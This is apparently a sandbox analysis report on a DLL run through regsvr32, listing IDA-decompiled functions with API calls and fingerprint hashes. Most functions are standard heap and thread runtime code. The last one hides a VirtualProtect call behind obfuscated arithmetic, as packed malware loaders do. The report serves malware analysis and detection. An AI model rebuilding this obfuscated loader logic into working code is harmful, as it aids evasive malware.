                                                                                                            				_t1 =  *0x1004d408; // 0x6beb70
                                                                                                            				if(_t1 == 0) {
                                                                                                            					ExitProcess(_t1);
                                                                                                            				}
                                                                                                            				_push("DllRegisterServer");
                                                                                                            				_push(_t1);
                                                                                                            				 *((intOrPtr*)(E10004780()))(); // executed
                                                                                                            				return 0;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID: DllRegisterServer$pk
                                                                                                            • API String ID: 621844428-609878878
                                                                                                            • Opcode ID: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                                                            • Instruction ID: 3990abb4a36e91ec48151b626d133cf46f0332b691c0db4f0bfff747b4acf562
                                                                                                            • Opcode Fuzzy Hash: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                                                            • Instruction Fuzzy Hash: 5BC08CB1A002191BE601EBF29C8CE0B329C8B801877020414F100D2005EF30E10002A9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E100350EA(intOrPtr __ecx, void* __eflags) {
                                                                                                            				void* _t37;
                                                                                                            				intOrPtr _t54;
                                                                                                            				void* _t56;
                                                                                                            
                                                                                                            				E10011BF0(0x1003a421, _t56);
                                                                                                            				_push(__ecx);
                                                                                                            				_t54 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
                                                                                                            				E10035766(__ecx, __eflags); // executed
                                                                                                            				 *((intOrPtr*)(_t56 - 4)) = 0;
                                                                                                            				 *((intOrPtr*)(__ecx)) = 0x1003d6fc;
                                                                                                            				if( *((intOrPtr*)(_t56 + 8)) == 0) {
                                                                                                            					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                                                                                                            				} else {
                                                                                                            					 *((intOrPtr*)(_t54 + 0x4c)) = E10011F76( *((intOrPtr*)(_t56 + 8)));
                                                                                                            				}
                                                                                                            				_t37 = E100373B5();
                                                                                                            				_t44 = _t37;
                                                                                                            				_push(0x10035062);
                                                                                                            				_t7 = _t44 + 0x1070; // 0x1070
                                                                                                            				 *((intOrPtr*)(E10037855(_t7) + 4)) = _t54;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x28)) = GetCurrentThread();
                                                                                                            				 *((intOrPtr*)(_t54 + 0x2c)) = GetCurrentThreadId();
                                                                                                            				 *((intOrPtr*)(_t37 + 4)) = _t54;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x40)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x78)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x60)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x64)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x50)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x5c)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x84)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x54)) = 0;
                                                                                                            				 *((short*)(_t54 + 0x8e)) = 0;
                                                                                                            				 *((short*)(_t54 + 0x8c)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x44)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x88)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x7c)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x80)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x6c)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x70)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x90)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x98)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x58)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x68)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x94)) = 0x200;
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
                                                                                                            				return _t54;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 100350EF
                                                                                                              • Part of subcall function 10035766: __EH_prolog.LIBCMT ref: 1003576B
                                                                                                            • GetCurrentThread.KERNEL32 ref: 1003513D
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10035146
                                                                                                              • Part of subcall function 10011F76: _strlen.LIBCMT ref: 10011F80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentH_prologThread$_strlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1650857145-0
                                                                                                            • Opcode ID: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                                                            • Instruction ID: 61552a51ecdf068f7bb4f9f9d17d647312d48b00674ee0c1313581d8a4369c28
                                                                                                            • Opcode Fuzzy Hash: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                                                            • Instruction Fuzzy Hash: 44218CB0800B509FD321CF6AD44569AFBF8FFA4641F10891FE5AA8BB21CBB5A541CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 178 1001382a-10013842 call 10012514 181 10013845-1001384d 178->181 182 10013844 178->182 183 100138b4-100138b6 181->183 184 1001384f-10013856 181->184 182->181 185 100138b8-100138be 183->185 186 100138dd 183->186 187 10013858-1001386a 184->187 188 1001389f-100138a1 184->188 185->186 191 100138c0-100138c9 call 10014676 185->191 189 100138df-100138e4 call 1001254f 186->189 187->188 192 1001386c-1001388f call 10013a38 call 1001437a call 100138d4 187->192 188->186 190 100138a3-100138b2 RtlAllocateHeap 188->190 190->183 191->181 200 100138cf 191->200 192->190 204 10013891-1001389c call 10011c50 192->204 200->189 204->188
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E1001382A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				void* _t17;
                                                                                                            				long _t23;
                                                                                                            				long _t31;
                                                                                                            				void* _t33;
                                                                                                            				void* _t34;
                                                                                                            				void* _t40;
                                                                                                            
                                                                                                            				_push(0x10);
                                                                                                            				_push(0x10041e40);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
                                                                                                            				 *(_t33 - 0x20) = _t31;
                                                                                                            				if(_t31 == 0) {
                                                                                                            					_t31 = _t31 + 1;
                                                                                                            				}
                                                                                                            				do {
                                                                                                            					_t28 = 0;
                                                                                                            					 *(_t33 - 0x1c) = 0;
                                                                                                            					if(_t31 > 0xffffffe0) {
                                                                                                            						L9:
                                                                                                            						if(_t28 != 0 ||  *0x1004f58c == _t28) {
                                                                                                            							L13:
                                                                                                            							_t15 = _t28;
                                                                                                            							L14:
                                                                                                            							return E1001254F(_t15);
                                                                                                            						} else {
                                                                                                            							goto L11;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if( *0x10050a64 != 3) {
                                                                                                            						L7:
                                                                                                            						if(_t28 != 0) {
                                                                                                            							goto L13;
                                                                                                            						}
                                                                                                            						L8:
                                                                                                            						_t17 = RtlAllocateHeap( *0x10050a60, 8, _t31); // executed
                                                                                                            						_t28 = _t17;
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					_t31 = _t31 + 0x0000000f & 0xfffffff0;
                                                                                                            					 *(_t33 + 0xc) = _t31;
                                                                                                            					_t23 =  *(_t33 - 0x20);
                                                                                                            					_t40 = _t23 -  *0x10050a50; // 0x0
                                                                                                            					if(_t40 > 0) {
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            					E10013A38(_t23, 0, 4);
                                                                                                            					 *(_t33 - 4) =  *(_t33 - 4) & 0;
                                                                                                            					_push(_t23);
                                                                                                            					 *(_t33 - 0x1c) = E1001437A();
                                                                                                            					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
                                                                                                            					E100138D4();
                                                                                                            					_t28 =  *(_t33 - 0x1c);
                                                                                                            					if(_t28 == 0) {
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            					E10011C50(_t28, 0,  *(_t33 - 0x20));
                                                                                                            					_t34 = _t34 + 0xc;
                                                                                                            					goto L7;
                                                                                                            					L11:
                                                                                                            				} while (E10014676(_t31) != 0);
                                                                                                            				goto L14;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 1001386E
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 4078605025-0
                                                                                                            • Opcode ID: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                                                            • Instruction ID: 7e3eb1e6f8f5fb1ab58181eb2bcb74cf9bd6752373f8cd469f9ee3675e8c65d6
                                                                                                            • Opcode Fuzzy Hash: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                                                            • Instruction Fuzzy Hash: D711EF36D0076A9ADB01DBA48C41B9DB771FF807A0F12811AFC646F2E1DF34D9808B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 207 100107c8-100107d9 call 10012514 210 10010833-10010838 call 1001254f 207->210 211 100107db-100107e2 207->211 213 10010824 211->213 214 100107e4-100107fc call 10013a38 call 10013b9b 211->214 217 10010825-1001082d RtlFreeHeap 213->217 221 10010807-10010814 call 1001081b 214->221 222 100107fe-10010806 call 10013bc6 214->222 217->210 221->210 227 10010816-10010819 221->227 222->221 227->217
                                                                                                            C-Code - Quality: 18%
                                                                                                            			E100107C8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				char _t9;
                                                                                                            				intOrPtr _t12;
                                                                                                            				intOrPtr _t21;
                                                                                                            				void* _t22;
                                                                                                            
                                                                                                            				_push(0xc);
                                                                                                            				_push(0x10041d10);
                                                                                                            				_t9 = E10012514(__ebx, __edi, __esi);
                                                                                                            				_t21 =  *((intOrPtr*)(_t22 + 8));
                                                                                                            				if(_t21 != 0) {
                                                                                                            					if( *0x10050a64 != 3) {
                                                                                                            						_push(_t21);
                                                                                                            						goto L7;
                                                                                                            					} else {
                                                                                                            						E10013A38(__ebx, __edi, 4);
                                                                                                            						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                                                                                            						_t12 = E10013B9B(_t21);
                                                                                                            						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
                                                                                                            						if(_t12 != 0) {
                                                                                                            							_push(_t21);
                                                                                                            							_push(_t12);
                                                                                                            							E10013BC6();
                                                                                                            						}
                                                                                                            						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
                                                                                                            						_t9 = E1001081B();
                                                                                                            						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
                                                                                                            							_push( *((intOrPtr*)(_t22 + 8)));
                                                                                                            							L7:
                                                                                                            							_push(0);
                                                                                                            							_t9 = RtlFreeHeap( *0x10050a60); // executed
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E1001254F(_t9);
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 100107E6
                                                                                                              • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalEnterFreeHeapSection__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3012239193-0
                                                                                                            • Opcode ID: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                                                            • Instruction ID: e2f95eda502a26e356ba5135cb18e14e48cd53293581a9dd67e0285628cf36ea
                                                                                                            • Opcode Fuzzy Hash: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                                                            • Instruction Fuzzy Hash: C0F09635D0A215AAEB10DB60CC46B4E3B64EF00760F208014F5906D0D1DF74E5C0CAD5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 228 1001070f-10010725 call 10012514 231 10010755-10010757 228->231 232 10010727-1001072d 228->232 233 10010759 231->233 234 1001075a-10010761 231->234 232->231 235 1001072f-10010753 call 10013a38 call 1001437a call 10010781 232->235 233->234 236 10010763-10010766 234->236 237 10010769-10010772 RtlAllocateHeap 234->237 235->231 240 10010778-1001077d call 1001254f 235->240 236->237 237->240
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E1001070F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				long _t19;
                                                                                                            				void* _t21;
                                                                                                            				void* _t24;
                                                                                                            
                                                                                                            				_push(0xc);
                                                                                                            				_push(0x10041d00);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t19 =  *(_t21 + 8);
                                                                                                            				if( *0x10050a64 != 3) {
                                                                                                            					L3:
                                                                                                            					if(_t19 == 0) {
                                                                                                            						_t19 = _t19 + 1;
                                                                                                            					}
                                                                                                            					if( *0x10050a64 != 1) {
                                                                                                            						_t19 = _t19 + 0x0000000f & 0xfffffff0;
                                                                                                            					}
                                                                                                            					_t9 = RtlAllocateHeap( *0x10050a60, 0, _t19); // executed
                                                                                                            				} else {
                                                                                                            					_t24 = _t19 -  *0x10050a50; // 0x0
                                                                                                            					if(_t24 > 0) {
                                                                                                            						goto L3;
                                                                                                            					} else {
                                                                                                            						E10013A38(__ebx, __edi, 4);
                                                                                                            						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
                                                                                                            						_push(_t19);
                                                                                                            						 *(_t21 - 0x1c) = E1001437A();
                                                                                                            						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
                                                                                                            						E10010781();
                                                                                                            						_t9 =  *(_t21 - 0x1c);
                                                                                                            						if( *(_t21 - 0x1c) == 0) {
                                                                                                            							goto L3;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E1001254F(_t9);
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 10010731
                                                                                                              • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,10041D00,0000000C,1001079A,000000E0,100107C5,?,100139BB,00000018,10041E50,00000008,10013A51,?,?), ref: 10010772
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateCriticalEnterHeapSection__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 409319249-0
                                                                                                            • Opcode ID: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                                                            • Instruction ID: 42b023ab18c65cc465c375f16582ad1359b716bf9f3aedd515ba29da9f54a78b
                                                                                                            • Opcode Fuzzy Hash: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                                                            • Instruction Fuzzy Hash: 1DF06D75E45665ABEB10EB708C4AB8D7BB4FB003A1F150114F9A1AE1E1D7B0BAC08E95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 247 10013a83-10013aa1 HeapCreate 248 10013aa3-10013ab0 call 10013a69 247->248 249 10013acd-10013acf 247->249 252 10013ad0-10013ad3 248->252 253 10013ab2-10013abf call 10013b53 248->253 253->252 256 10013ac1-10013ac7 HeapDestroy 253->256 256->249
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10013A83(intOrPtr _a4) {
                                                                                                            				void* _t6;
                                                                                                            				intOrPtr _t8;
                                                                                                            
                                                                                                            				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                            				 *0x10050a60 = _t6;
                                                                                                            				if(_t6 == 0) {
                                                                                                            					L4:
                                                                                                            					return 0;
                                                                                                            				} else {
                                                                                                            					_t8 = E10013A69();
                                                                                                            					 *0x10050a64 = _t8;
                                                                                                            					if(_t8 != 3 || E10013B53(0x3f8) != 0) {
                                                                                                            						return 1;
                                                                                                            					} else {
                                                                                                            						HeapDestroy( *0x10050a60);
                                                                                                            						goto L4;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}






                                                                                                            APIs
                                                                                                            • HeapCreate.KERNEL32(00000000,00001000,00000000,10011217,00000001,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013A94
                                                                                                              • Part of subcall function 10013B53: HeapAlloc.KERNEL32(00000000,00000140,10013ABC,000003F8,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B60
                                                                                                            • HeapDestroy.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013AC7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocCreateDestroy
                                                                                                            • String ID:
                                                                                                            • API String ID: 2236781399-0
                                                                                                            • Opcode ID: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                                                            • Instruction ID: e8a57e519fdf56151fc66cac883b31846c607769bf618c359d49edee3f1857a7
                                                                                                            • Opcode Fuzzy Hash: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                                                            • Instruction Fuzzy Hash: 6BE01A74A953559EEB01EB718C45B1A37E4EB44682F488829F442CD4A1EB70D680A602
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 257 10003310-10003320 258 10003322-1000332a 257->258 259 1000332b-10003374 257->259 260 100033fa-100034e1 259->260 261 1000337a-10003387 259->261 262 10003500-1000356c VirtualProtect 260->262 263 100034e3-100034fc 260->263 264 10003389-1000338e 261->264 265 100033ed-100033f9 261->265 263->262 266 10003390-1000339c 264->266 267 100033cd-100033ea 264->267 266->267 268 1000339e-100033cb 266->268 267->265 268->265 268->267
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E10003310() {
                                                                                                            				long _t80;
                                                                                                            				signed int _t83;
                                                                                                            				signed int _t87;
                                                                                                            				intOrPtr _t91;
                                                                                                            				signed int _t101;
                                                                                                            				signed int _t116;
                                                                                                            				signed int _t122;
                                                                                                            				intOrPtr _t126;
                                                                                                            				signed int _t127;
                                                                                                            				signed int _t132;
                                                                                                            				signed int _t135;
                                                                                                            				intOrPtr* _t137;
                                                                                                            				intOrPtr* _t141;
                                                                                                            				signed int _t150;
                                                                                                            				signed int _t158;
                                                                                                            				signed int _t165;
                                                                                                            				signed int _t175;
                                                                                                            				signed int _t186;
                                                                                                            				signed int _t216;
                                                                                                            				signed int _t223;
                                                                                                            				signed int _t227;
                                                                                                            				intOrPtr _t235;
                                                                                                            				signed int _t238;
                                                                                                            				void* _t239;
                                                                                                            
                                                                                                            				_t80 =  *(_t239 + 0x18);
                                                                                                            				_t126 =  *((intOrPtr*)(_t80 + 8));
                                                                                                            				 *((intOrPtr*)(_t239 + 8)) = _t126;
                                                                                                            				if(_t126 != 0) {
                                                                                                            					_t132 =  *(_t80 + 0xc);
                                                                                                            					_t127 =  *0x1004b0dc; // 0x0
                                                                                                            					_t5 = _t127 + 1; // 0x1
                                                                                                            					_t101 =  *0x1004b0ec; // 0x0
                                                                                                            					_t165 =  *0x1004b0e0; // 0x0
                                                                                                            					_t7 = _t165 + 0x1000000; // 0x1000000
                                                                                                            					_t83 =  *0x1004b0e4; // 0x0
                                                                                                            					_t150 =  *0x1004b0d8; // 0x0
                                                                                                            					 *(_t239 + 0x10) = _t132;
                                                                                                            					if((_t132 & _t83 * 0x7fffffff + _t165 + _t7 - _t5 * _t127 + _t101 + _t150 << 0x00000001) == 0) {
                                                                                                            						_t35 = _t83 * _t165 + 1; // 0x1
                                                                                                            						 *(_t239 + 0x1c) = _t83 * _t165;
                                                                                                            						_t135 =  *0x1004b0e8; // 0x0
                                                                                                            						asm("sbb ebp, ebp");
                                                                                                            						asm("sbb edi, edi");
                                                                                                            						_t216 =  *0x1004b0d8; // 0x0
                                                                                                            						_t223 =  *0x1004b0d8; // 0x0
                                                                                                            						asm("sbb esi, esi");
                                                                                                            						_t158 =  *0x1004b0ec; // 0x0
                                                                                                            						 *(_t239 + 0x14) =  *(0x1004b0f4 + ( ~( ~(_t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 + _t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 - 0x80000000 &  *(_t239 + 0x10))) + ( ~( ~(0x40000000 + ((_t35 * 0x3fffffff + _t135) * _t127 + (_t135 * _t165 + 0x00000001) * _t150) * 0x00000004 &  *(_t239 + 0x10))) +  ~( ~(_t150 + _t135 * 0x00000002 + _t135 + _t150 + _t135 * 0x00000002 + _t135 + 0x20000000 &  *(_t239 + 0x10))) * 2) * 2) * 4);
                                                                                                            						_t175 =  *0x1004b0e0; // 0x0
                                                                                                            						_t116 = _t158 * _t127;
                                                                                                            						if(( *(_t239 + 0x10) & (_t116 * _t127 + _t116 * _t127 * 0x00000002 - 0x00000006) * _t127 + _t175 + _t175 - _t135 - _t158 + _t83 + _t223 + (_t175 + _t175 - _t135 - _t158 + _t83 + _t223) * 0x00000002 + 0x04000000) != 0) {
                                                                                                            							 *(_t239 + 0x14) =  *(_t239 + 0x14) | _t158 * _t83 *  *0x1004b0e0 + 0x00000200 + _t158 * _t83 *  *0x1004b0e0 * 0x00000002;
                                                                                                            						}
                                                                                                            						_t186 =  *0x1004b0e0; // 0x0
                                                                                                            						_t227 = _t158 * 0x3fffffff;
                                                                                                            						_t122 =  *0x1004b0d8; // 0x0
                                                                                                            						_t74 = _t227 + 1; // 0x1
                                                                                                            						_t87 = VirtualProtect( *( *(_t239 + 0x30)),  *((intOrPtr*)(_t239 + 0x20)) + (_t83 * 0x3fffffff + (_t122 + _t74) * _t186 + _t122 + (2 -  *((intOrPtr*)(_t239 + 0x24)) - _t135 - _t158) * _t127) * 4,  *(_t239 + 0x18), _t239 + 0x28 + ((_t116 + _t135) * _t158 + _t186) * 8); // executed
                                                                                                            						asm("sbb eax, eax");
                                                                                                            						return  ~( ~_t87);
                                                                                                            					} else {
                                                                                                            						_t137 =  *((intOrPtr*)(_t239 + 0x28));
                                                                                                            						_t235 =  *_t137;
                                                                                                            						 *((intOrPtr*)(_t239 + 0x28)) = _t235;
                                                                                                            						if(_t235 ==  *((intOrPtr*)(_t137 + 4))) {
                                                                                                            							if( *((intOrPtr*)(_t137 + 0x10)) != 0) {
                                                                                                            								L7:
                                                                                                            								_t91 =  *((intOrPtr*)(_t239 + 0x24));
                                                                                                            								 *((intOrPtr*)(_t91 + 0x20))( *(_t239 + 0x30),  *(_t239 + 0x1c), 0x4000 - _t101,  *((intOrPtr*)(_t91 + 0x34)));
                                                                                                            							} else {
                                                                                                            								_t141 =  *((intOrPtr*)(_t239 + 0x24));
                                                                                                            								_t238 =  *(_t141 + 0x3c);
                                                                                                            								if( *((intOrPtr*)( *_t141 + 0x38)) == _t238 || (_t150 + 2) * _t101 + _t83 + _t165 * 2 + ((_t150 + 2) * _t101 + _t83 + _t165 * 2) * 2 - (_t83 * _t127 * _t127 + 3 + _t83 * _t127 * _t127 * 2) *  *0x1004b0e8 +  *(_t239 + 0x18) % _t238 == 0) {
                                                                                                            									goto L7;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						return 1;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            			}




























                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
